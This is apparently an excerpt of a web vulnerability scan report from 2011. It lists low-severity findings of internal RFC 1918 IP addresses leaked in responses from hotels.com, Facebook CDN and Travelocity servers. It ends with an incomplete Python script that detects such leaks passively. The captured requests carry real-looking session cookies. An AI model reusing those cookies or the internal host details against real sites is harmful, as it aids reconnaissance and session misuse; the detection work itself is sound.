Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.186.82.5

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=b13993a9-6a8d-446c-875a-40575b17874e&ip=10.186.82.5 -->
...[SNIP]...

23.66. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.186.82.5

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:26 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe003:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 1251
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=8e5da332-341e-45c6-9273-e47e77e107dc&ip=10.186.82.5 -->
...[SNIP]...

23.67. http://static.ak.connect.facebook.com/connect.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.94.126

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS
If-None-Match: "c9db37e42d1614938a4a7574682e196c"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.94.126
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=1044
Expires: Mon, 03 Oct 2011 00:18:32 GMT
Date: Mon, 03 Oct 2011 00:01:08 GMT
Connection: close

/*1317445939,169893502,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.68. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.32.170.119 (in the X-FB-Server response header)

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS
If-None-Match: "0c369d4899210be922f0cf403cdf1976"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "ff1bc4a4dd923189e80d0e2def62a56c"
X-FB-Server: 10.32.170.119
X-Cnection: close
Content-Length: 211338
Vary: Accept-Encoding
Cache-Control: public, max-age=999
Expires: Mon, 03 Oct 2011 00:17:39 GMT
Date: Mon, 03 Oct 2011 00:01:00 GMT
Connection: close

/*1317447404,169912951,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.69. http://static.ak.connect.facebook.com/images/connect_sprite.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/connect_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.33.10.108 (in the X-FB-Server response header; the image body itself is not involved)

Request

GET /images/connect_sprite.png HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
X-FB-Server: 10.33.10.108
X-Cnection: close
Content-Length: 1916
Cache-Control: max-age=70119
Expires: Mon, 03 Oct 2011 19:32:15 GMT
Date: Mon, 03 Oct 2011 00:03:36 GMT
Connection: close

(binary PNG data: PNG signature, IHDR and PLTE chunks; not reproduced)
...[SNIP]...

23.70. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.32.103.127 (in the X-FB-Server response header)

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.103.127
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=437
Expires: Mon, 03 Oct 2011 02:00:09 GMT
Date: Mon, 03 Oct 2011 01:52:52 GMT
Connection: close

/*1317446434,169895807,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.71. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.32.161.113 (in the X-FB-Server response header)

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4 HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.161.113
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=874
Expires: Mon, 03 Oct 2011 00:16:28 GMT
Date: Mon, 03 Oct 2011 00:01:54 GMT
Connection: close

/*1317593643,169910641,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.72. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.32.195.104 (in the X-FB-Server response header)

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/xd_receiver.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.32.195.104
X-Cnection: close
Content-Length: 3386
Cache-Control: max-age=76458
Expires: Mon, 03 Oct 2011 23:07:44 GMT
Date: Mon, 03 Oct 2011 01:53:26 GMT
Connection: close
Vary: Accept-Encoding

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

23.73. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.30.145.198 (in the X-FB-Server response header)

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/?xd_receiver=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 3386
Vary: Accept-Encoding
Cache-Control: max-age=1996474
Expires: Wed, 26 Oct 2011 02:35:47 GMT
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

23.74. http://static.ak.fbcdn.net/connect.php/js/FB.Share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.212.35 (in the X-FB-Server response header)

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "b5cf019c25115e9007f05a784bdf583c"

Response

HTTP/1.1 200 OK
ETag: "f73915a1c9a56247298577922a325cbc"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.54.212.35
X-Cnection: close
Content-Length: 6585
Cache-Control: public, max-age=1121
Expires: Mon, 03 Oct 2011 00:08:14 GMT
Date: Sun, 02 Oct 2011 23:49:33 GMT
Connection: close

/*1317445880,171365411,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.30.148.190 (in the X-FB-Server response header)

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc75419c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ffcc6369f4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=57651
Expires: Mon, 03 Oct 2011 16:08:16 GMT
Date: Mon, 03 Oct 2011 00:07:25 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.76. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travelocity.tt.omtrdc.net
Path:   /m2/travelocity/mbox/standard

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.19.84.47 (inside a commented-out block of JavaScript in the response body, alongside the development and certification hostnames dev.sabre.com, localhost and cert.travelocity.com; unlike the Facebook findings, this is body content served by the Test & Target mbox, not a response header)

Request

GET /m2/travelocity/mbox/standard?mboxHost=www.travelocity.com&mboxSession=1317600481056-80236&mboxPage=1317600481056-80236&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxCount=1&ServiceTag=TRAVELOCITY&mbox=HMP&mboxId=0&mboxTime=1317582481071&mboxURL=http%3A%2F%2Fwww.travelocity.com%2F&mboxReferrer=http%3A%2F%2Fwww.travelocity.com%2Fresolve%2Fdefault&mboxVersion=39 HTTP/1.1
Host: travelocity.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2713
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('HMP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-HMP-0">');mb
...[SNIP]...
}\r\n\r\n\/* if((location.href.indexOf(\'dev.sabre.com\') != -1) ||\r\n (location.href.indexOf(\'localhost\') != -1) ||\r\n (location.href.indexOf(\'file:\/\/\') != -1) ||\r\n (location.href.indexOf(\'10.19.84.47\') != -1) ||\r\n (location.href.indexOf(\'cert.travelocity.com\') != -1) ||\r\n (location.href.indexOf(\'tcysnc\') != -1)){\r\n var hosttype=\"cert\";\r\n }else{ var hosttype=\"travel\";}\r\n*\/\r\
...[SNIP]...
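
Every finding in this group comes from the same passive check: either a response header (X-FB-Server on the Facebook hosts) or, in the Test & Target capture directly above, a commented-out block of JavaScript carries an address from an RFC 1918 range. The script below is added to this report as an illustration; it is not part of Burp Suite or of the XSS.CX crawler. It reproduces the check offline: it splits a raw HTTP response into headers and body, extracts dotted-quad candidates, filters them through the three RFC 1918 blocks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) so that version strings such as 2.0.1.68 and public addresses do not register, and reports where each hit sits. The sample responses inside it are constructed to mirror the captures above; the function and variable names are the example's own.

```python
"""Passive check for RFC 1918 IPv4 addresses leaking in HTTP responses.

Added example for this report; not Burp Suite or XSS.CX code. Sample
responses below are constructed to resemble the captures in the report.
"""
import ipaddress
import re
from typing import List, Tuple

# Dotted-quad candidates. The boundaries stop a match from starting or
# ending inside a longer digit/dot run; range filtering (not the regex)
# is what rejects version strings such as "2.0.1.68".
_IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# The three RFC 1918 private address blocks.
PRIVATE_NETS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)


def is_rfc1918(token: str) -> bool:
    """True if token parses as an IPv4 address inside an RFC 1918 block."""
    try:
        addr = ipaddress.IPv4Address(token)
    except ipaddress.AddressValueError:
        return False  # e.g. "999.1.2.3" matched the regex but is not an address
    return any(addr in net for net in PRIVATE_NETS)


def split_response(raw: str) -> Tuple[List[Tuple[str, str]], str]:
    """Split a raw HTTP response into ([(header, value), ...], body).

    Line endings are normalised and the status line is dropped.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = []
    for line in head.split("\n")[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers, body


def find_private_ips(raw_response: str) -> List[Tuple[str, str, str]]:
    """Return [(location, context, ip), ...] for each RFC 1918 address.

    location is "header" (context = header name) or "body" (context =
    a short snippet around the match), mirroring how the report above
    distinguishes X-FB-Server leaks from the Test & Target body leak.
    """
    findings: List[Tuple[str, str, str]] = []
    headers, body = split_response(raw_response)
    for name, value in headers:
        for tok in _IPV4_RE.findall(value):
            if is_rfc1918(tok):
                findings.append(("header", name, tok))
    for m in _IPV4_RE.finditer(body):
        if is_rfc1918(m.group(0)):
            start = max(0, m.start() - 30)
            snippet = body[start:m.end() + 30].replace("\n", " ")
            findings.append(("body", snippet, m.group(0)))
    return findings


# Constructed samples (not verbatim captures) modelled on this report.
SAMPLE_HEADER_LEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/x-javascript; charset=utf-8\r\n"
    "X-FB-Server: 10.32.94.126\r\n"
    "X-Cnection: close\r\n"
    "\r\n"
    "/*1317445939,169893502,JIT Construction: v451912,en_US*/\r\n"
)

SAMPLE_BODY_LEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/javascript\r\n"
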